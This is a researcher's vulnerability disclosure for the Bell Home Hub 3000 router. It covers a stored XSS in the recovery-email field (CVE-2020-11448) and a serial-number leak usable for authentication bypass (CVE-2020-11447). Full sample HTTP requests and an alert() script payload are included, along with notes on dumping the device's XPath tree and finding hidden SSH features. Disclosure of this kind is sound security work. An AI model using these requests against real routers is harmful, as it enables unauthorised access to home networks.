HH3K CVEs
Bell Home Hub 3000 Vulnerabilites
CVE’s
XSS: CVE-2020-11448
Serial Number Leak: CVE-2020-11447
Foreword
This is some research I performed in 2020, and attempted to disclose to them during that time period. I had communicated with them during 2020, and reported the vulnerabilities to there team, and they ended up ghosting me. So now that well, 3+ years have past, its finally time to publish these.
These aren’t major vulnerabilities, but show the lack of care taken when programming something secure.
CVE-2020-11448 - XSS Within Login Page
Within the Routers firmware page you are able to set a Recovery Email + Recovery Password to get your admin panel password incase you forget it, However the limits on what you are allowed to put in it are client-side, meaning if you intercept the request with a tool like burp, you are able to do stuff like this on the login window
You can change either the phone # or email to the same effect, (ex payload <script>alert(\"1\");</script>
Sample Request:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /cgi/json-req HTTP/1.1
Host: 192.168.2.1
Content-Length: 739
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://192.168.2.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.2.1/?c=modempreferences
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ignoreMobileRedirectCheck=true; lang=en; bell_session={"req_id":116,"sess_id":1570480049,"basic":false,"user":"admin","dataModel":{"name":"Internal","nss":[{"name":"gtw","uri":"http://sagemcom.com/gateway-data"}]},"ha1":"xyz","nonce":"2126360995"}
Connection: close
req={"request":{"id":115,"session-id":1570480049,"priority":false,"actions":[{"id":0,"method":"setValue","xpath":"Device/Services/SetLEDState","parameters":{"value":true}},{"id":1,"method":"setValue","xpath":"Device/Services/Notification/CredentialsRequestEnable","parameters":{"value":true}},{"id":2,"method":"setValue","xpath":"Device/Services/Notification/DestinationEmailAddress","parameters":{"value":"<script>alert(\"test\");</script>"}},{"id":3,"method":"setValue","xpath":"Device/Services/Notification/DestinationSMSNumber","parameters":{"value":""}},{"id":4,"method":"setValue","xpath":"Device/Services/Notification/DisplayOnScreen","parameters":{"value":true}}],"cnonce":3315927412,"auth-key":"618c8f5c9213624cffd403747b257c5f"}}
(Decoded from URL Encoding, needs valid Authentication)
CVE-2020-11447 - Serial Number leak leading to authentication bypass
The Main Method of the Home Hub data storage is done with XML, and you can interface with it via /cgi/json-req and XPATH, you are able to retrieve and set most values. Within the router, the serial number is used as a second means of authentication.
if we send a “getValue” to XPATH "Device/DeviceInfo/SerialNumber"
we are able to view this serial number, and obtain further access within the device,
Sample Request Body:
1
req={"request":{"id":request-id,"session-id":session-id,"priority":false,"actions":[{"id":0,"method":"getValue","xpath":"Device/DeviceInfo/SerialNumber"}],"cnonce":cnonce,"auth-key":"authkey"}}
Note: you need to be authenticated to perform this.
Other interesting findings:
During my research I found several interesting findings not mentioned above, I was able to dump the entire XPATH by sending a getValue to Device//* and noticed several unused features within the device, such as captive portal support, but most interestingly ssh and telnet and some remote management features, upon trying to enable SSH I get a Non writable error, however I see within the browser source code a remote user is able to enable it from the settings, and the UID of the user we use to login with is uid 4, meaning there is at least 3 other accounts within the system.